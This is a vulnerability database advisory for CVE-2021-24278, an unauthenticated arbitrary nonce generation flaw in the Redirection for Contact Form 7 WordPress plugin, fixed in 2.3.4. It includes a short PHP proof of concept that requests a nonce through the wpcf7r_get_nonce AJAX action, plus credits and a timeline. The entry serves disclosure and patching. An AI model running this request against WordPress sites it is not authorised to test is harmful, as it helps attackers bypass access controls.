Redirection for Contact Form 7 < 2.3.4 – Unauthenticated Arbitrary Nonce Generation | CVE 2021-24278 | Plugin Vulnerabilities

Description

In the plugin, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.

Proof of Concept

<?php
// Settings
$wp_url = $argv[1];

// Get nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
   'action' =>  'wpcf7r_get_nonce',
   'param' => '[ANY ACTION HERE]'

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);


?>

Affects Plugins

Fixed in 2.3.4

References

CVE

URL

https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://wordfence.com

Submitter twitter

Verified

Yes

WPVDB ID

99f30604-d62b-4e30-afcd-b482f8d66413

Timeline

Publicly Published

2021-04-20 (about 4 years ago)

Added

2021-04-20 (about 4 years ago)

Last Updated

2021-04-21 (about 4 years ago)

Other

Published

Title

Published

2024-12-04

Title

Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins < 2.0.59 - Sensitive Information Exposure

Published

2024-06-27

Title

Elements kit Elementor addons < 3.2.0 - Missing Authorization

Published

2021-12-23

Title

Protect WP Admin < 3.6.2 - Unauthenticated Plugin Deactivation

Published

2021-10-13

Title

Brizy 1.0.127 - 2.3.11 - Incorrect Authorization to Post Modification

Published

2021-11-01

Title

Stylish Cost Calculator < 7.0.4 - Subscriber+ Unauthorised AJAX Calls to Stored XSS